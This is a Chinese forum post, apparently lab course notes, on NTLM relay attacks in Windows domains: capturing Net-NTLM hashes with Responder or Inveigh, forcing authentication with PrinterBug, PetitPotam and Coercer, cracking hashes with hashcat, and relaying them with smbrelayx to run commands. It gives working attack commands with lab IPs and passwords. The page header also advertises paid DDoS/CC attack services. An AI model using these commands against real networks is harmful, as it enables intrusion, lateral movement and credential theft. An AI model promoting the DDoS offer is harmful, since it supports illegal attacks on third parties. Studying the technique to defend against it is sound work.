登录/ 注册
 找回密码
 立即注册
关闭

CSDN热搜

程序园 精品问答 技术交流 资源下载
返回列表 发新帖
首页 业界区 安全 184天

184天

创蟀征 2 小时前
猛犸象科技工作室:网站开发,备案域名,渗透,服务器出租,DDOS/CC攻击,TG加粉引流
NTLM Relay其实严格意义上并不能叫NTLM Relay,而是应该叫 Net-NTLM Relay。它是发生在NTLM认证的第三步,在 Type3 Response消息中存在Net-NTLM Hash,当攻击者获得了Net-NTLM Hash后,可以进行中间人攻击,重放Net-NTLM Hash,这种攻击手法也就是大家所说的NTLM Relay(NTLM 中继)攻击。NTLM Relay Attack(NTLM中继攻击)指的是强制目标服务器、目标用户使用LM Hash、NTLM Hash对攻击者的服务器进行认证,攻击者将该认证中继至其他目标服务器中(域控等),根据目标域的防护等级可以在活动目录域中进行横向移动或权限提升,流程可见上图。
尝试捕获Net-NTLM Hash数据,怎么捕获:
强制请求漏洞
被动钓鱼:基于文件 网页 命令 诱惑对方去访问监听主机
捕获到利用重放脚本去攻击主机
不成功的话就拿来暴力破解Net-NTLM Hash后续利用
进行NTLM Relay攻击有两步:
第一步是捕获Net-NTLM Hash
第二步是重放Net-NTLM Hash
第二步是爆破Net-NTLM Hash
横向移动-NTLM监听-Responder&Inveigh

https://github.com/SpiderLabs/Responder
https://github.com/Kevin-Robertson/Inveigh
横向移动-NTLM条件-强制触发&被动钓鱼

强制触发:(见上图) 用户名密码
PrinterBug PeitiPotam
DFSCoerce ShadowCoerce PrivExchange
例:利用打印机漏洞(printerbug.py)
例:利用PetitPotam漏洞(PetitPotam.py)
https://github.com/topotam/PetitPotam
https://github.com/dirkjanm/krbrelayx
自动化项目:https://github.com/p0dalirius/Coercer
扫描利用:
python3 Coercer.py scan -t 192.168.3.21 -u webadmin -p 'admin!@#45' -d god.org
强制触发:
强制让 192.168.3.33 访问 192.168.3.143
python3 Coercer.py  coerce -l 192.168.3.143 -t 192.168.3.33 -u webadmin -p 'admin!@#45' -d xiaodi.local --always-continue
被动钓鱼
参考:https://mp.weixin.qq.com/s/O-hYgpryXPJ-fCh8Nqggww
利用LLMNR&NBNS攻击
利用系统命令
利用钓鱼网页
利用office文档
利用系统图标
利用SCF文件
利用PDF文件
利用用户头像设置
横向移动-NTLM中继-暴力破解&Relay攻击

1、暴力破解明文密码(Net NTLM Hash不同)
hashcat -m 5600 hash pass.txt --show
2、利用Net-NTLM Hash中继攻击(Net NTLM Hash相同)
Relay To SMB
CS手工降权&提权:
权限提升 权限降权 进程注入 令牌窃取
进程注入
1.png

进行窃取
2.png

令牌窃取
3.png

这边必须要使用adminstrator用户权限
重放失败==> 暴力破解
利用:smbrelayx.py(ntlmrelayx.py)
3.143执行重放利用 中继到3.22后执行whoami命令
python smbrelayx.py -h 192.168.3.22 -c whoami
printerbug.py(>=2012)
python printerbug.py xiaodi.local/administrator:Xiaodi12345@192.168.3.33 192.168.3.143
python printerbug.py ./administrator:admin!@#45@192.168.3.33 192.168.3.143
printerbug.py
用域用户administrator强制让3.33访问3.143
python PetitPotam.py -d xiaodi.local -u administrator -p Xiaodi12345 192.168.3.33 192.168.3.143
用本地用户administrator强制让3.33访问3.143
python PetitPotam.py -d . -u administrator -p admin!@#45 192.168.3.33 192.168.3.143
Relay To EWS
Exchange认证也支持NTLM SSP的。于是我们可以将SMB流量Relay到Exchange的EWS接口,从而可以进行收发邮件等操作,还可以通过Homepage下发规则达到命令执行的效果。
Relay To LDAP
1、利用基于资源的约束性委派进行权限提升
2、Write Dcsync ACL Dump域内哈希

来源:程序园用户自行投稿发布,如果侵权,请联系站长删除
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
184天

使用道具 举报
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册
发帖
创蟀征
2 小时前

0

粉丝关注

19

主题发布

板块介绍填写区域,请于后台编辑
微信扫一扫